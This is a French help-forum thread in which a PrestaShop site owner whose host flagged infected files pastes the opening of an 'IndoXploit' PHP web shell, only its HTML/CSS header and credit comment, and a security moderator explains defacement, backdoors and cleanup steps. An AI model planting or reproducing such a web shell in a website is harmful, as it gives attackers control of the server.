Sujet Précédent Sujet Suivant

Attaque "exploit" sur fichiers sur mon serveur

Résolu/Fermé
TigerDTD Messages postés 859 Date d'inscription lundi 24 août 2009 Statut Membre Dernière intervention 28 février 2024 - Modifié le 14 févr. 2019 à 15:38
TigerDTD Messages postés 859 Date d'inscription lundi 24 août 2009 Statut Membre Dernière intervention 28 février 2024 - 4 avril 2019 à 15:41
Bonjour ...

J'ai un site fait avec prestashop, version 1.6.1.23 ... Il fonctionne bien pas de souci ...

Cependant IONOS ( 1&1 ) arrête pas de m'envoyer des messages pour me dire qu'ils bloquent l'accès à certains fichiers ( droit d'accès sur le FTP ) etc car ces fichiers seraient corrompus ... J'ai analysé les fichiers avec un antivirus sur mon pc ( qui lui même est à priori bien protégé et non infecté ) et rien de malveillant apparemment ...

Il semblerait qu'un code " exploit " etc ait été rajouté à ces fichiers et que le code soit donc malveillant d'après 1&1 ... Il y aurait 11 fichiers infectés dont je met le début du code du 1er ci dessous, que puis je faire svp ? Merci :) ... 

<html>
<head>
<title>IndoXploit</title>
<meta name='author' content='IndoXploit'>
<meta charset="UTF-8">
<style type='text/css'>
@import url(https://fonts.googleapis.com/css?family=Ubuntu%29;
html {
    background: #000000;
    color: #ffffff;
    font-family: 'Ubuntu';
 font-size: 13px;
 width: 100%;
}
li {
 display: inline;
 margin: 5px;
 padding: 5px;
}
table, th, td {
 border-collapse:collapse;
 font-family: Tahoma, Geneva, sans-serif;
 background: transparent;
 font-family: 'Ubuntu';
 font-size: 13px;
}
.table_home, .th_home, .td_home {
 border: 1px solid #ffffff;
}
th {
 padding: 10px;
}
a {
 color: #ffffff;
 text-decoration: none;
}
a:hover {
 color: gold;
 text-decoration: underline;
}
b {
 color: gold;
}
input[type=text], input[type=password],input[type=submit] {
 background: transparent; 
 color: #ffffff; 
 border: 1px solid #ffffff; 
 margin: 5px auto;
 padding-left: 5px;
 font-family: 'Ubuntu';
 font-size: 13px;
}
textarea {
 border: 1px solid #ffffff;
 width: 100%;
 height: 400px;
 padding-left: 5px;
 margin: 10px auto;
 resize: none;
 background: transparent;
 color: #ffffff;
 font-family: 'Ubuntu';
 font-size: 13px;
}
</style>
</head>
<?php
###############################################################################
// Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
// Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
// Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
// Tanpa kalian kita tidak akan BESAR seperti sekarang.
// Greetz: All Member IndoXploit. & all my friends.
###############################################################################
A voir également:

2 réponses

Réponse 1 / 2
TigerDTD Messages postés 859 Date d'inscription lundi 24 août 2009 Statut Membre Dernière intervention 28 février 2024 12
28 févr. 2019 à 12:17
Je suis victime d'autres "attaques" ... En effet d'autres fichiers m'ont été signalés par 1&1 comme infectés ... Mais pourrait il s'agir simplement de modifications faites de la part de google qui a plus ou moins acces a certains sites grâca à google analytics ou autre par exemple ? MErci :)
0
Réponse 2 / 2
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660
Modifié le 28 févr. 2019 à 15:07
Salut,

C'est du defacing, voir : https://www.malekal.com/defacement-de-site/
C'est seulement la partie visibles, d'autres groupes ou attaques automatisées ont pu aussi modifier desp ages pour rediriger les internautes vers du contenu malveillants, voler tes bases de données, etc.

donc là faut revenir à une sauvegarde antérieure
  • Vérifier les accès (création de compte non souhaité)
  • changer tous les mots de passe d'accès
  • Vérifier si une backdoor a été implantée
  • Tout mettre à jour (plugins etc) afin de combler des vulnérabilités présentes
0
TigerDTD Messages postés 859 Date d'inscription lundi 24 août 2009 Statut Membre Dernière intervention 28 février 2024 12
28 févr. 2019 à 14:39
Bonjour ... et merci de ta réponse :) ...

Pour être sur, en fait le defacement utilise une faille de securité mais ou ?

Est-ce dans mon logiciel FTP que je dois modifier le mot de passe par exemple ? Est-ce sur la page admin de mon site ? Est-ce sur mon ordi ( antivirus ou autre ) ? ...

Merci ...

Ensuite en fait j'ai pas compris de suite les courriels que m'avaient envoyé IONOS ( 1&1 ) à c e sujet, donc le temps de capter etc, il m'ont proposé une sauvegarde qu'ils ont mise sur le serveur mais ou certains fichiers étaient probablement déjà infectés, car le temps de checker etc et je n'ai pas pu faire de sauvegarde manuelle , sur mon ordi par exemple, car les fichiers éteient bloqués au transfert par FTP, donc je me retrouve avec une vielle sauvegarde ou une sauvegarde avec fichiers infectés ... IONOS m'assure que de leur côté y'a pas de souci ... ( même si j'ai des doutes que je ne peux vérifier ) ... Mais en dehors le site est totalement à jour désormais ...

Une backdoor, c'est quoi ? ou ? et comment puis je le savoir ?

A priori aucun compte créé ou log fait à mon insu :) ...

Merci :)
0
Malekal_morte- Messages postés 180304 Date d'inscription mercredi 17 mai 2006 Statut Modérateur, Contributeur sécurité Dernière intervention 15 décembre 2020 24 660 > TigerDTD Messages postés 859 Date d'inscription lundi 24 août 2009 Statut Membre Dernière intervention 28 février 2024
28 févr. 2019 à 15:23
Surement oui une faille de sécurité d'où la mise à jour de tous les plugins et CSM s'il ne l'est pas.
Pour la backdoor, c'est une page PHP qui permet de contrôler le serveur.

Il faut modifier les mots de passe d'accès au site, une fois une version saine remise en place.
0
TigerDTD Messages postés 859 Date d'inscription lundi 24 août 2009 Statut Membre Dernière intervention 28 février 2024 12
Modifié le 28 févr. 2019 à 15:33
Mise à jour de tout ok :) ...

A première vu je ne vois aucun fichier php qui ne serait pas d'origine ... Sinon y'a des milliers de fichiers, comment le voir ?

Puis je n'ai pas de sauvegarde saine à part trop ancienne ( oui je sais mais j'ai du laisser faire IONOS beaucoup de manip etc, bref :) ... ) et du coup je ne saurais modifier ces fichiers moi même pour les rendre à nouveaux sains ... Il y a environ une vingtaine de fichiers infectés ...

Mais comment peuvent ils modifier des choses sur mon site sans avoir acces par FTP ? juste avec l'admin ?
0
TigerDTD Messages postés 859 Date d'inscription lundi 24 août 2009 Statut Membre Dernière intervention 28 février 2024 12
28 févr. 2019 à 16:00
Tous les fichiers infectés semblent être dans le même module ... Je peux peut être simplement désintaller et réinstaller le module ? Il s'agit du module VTEM Skitter ...
0
TigerDTD Messages postés 859 Date d'inscription lundi 24 août 2009 Statut Membre Dernière intervention 28 février 2024 12
28 févr. 2019 à 17:10
Meme si je fais ça il faut que je supprime carrement le module pour supprimer les fichiers de mon FTP ?
Puis je peux aussi rajouter les fichiers de base par dessus ceux la mais est-ce suffisant et fonctionnera t il encore ? Et si je supprime les fichiers manuellement par FTP, puis je ensuite réinstaller le module qui lui réinstallera les fichiers sur le serveur ? Et si oui j'ai peur des imcompatibilites/bug ( y'en a toujours ) ensuite car reinstallé et pas installé au départ ...
0

Discussions similaires

qu'est-ce que diff message ?
zebulonmarie -
mumu -

18 réponses
comment donner les droits sur fichier partage
ch'ti du 57 -
fil1958 -

2 réponses
Pas d'internet - Impossible d'atteindre le serveur DHCP
Meelia -
Meelia -

5 réponses
chaima csc
chaima -
chaima -

1 réponse
Comment reconnaitre si un SMS m'indiquant un message vocal est une arnaque ?
kikidefer -
brucine -

9 réponses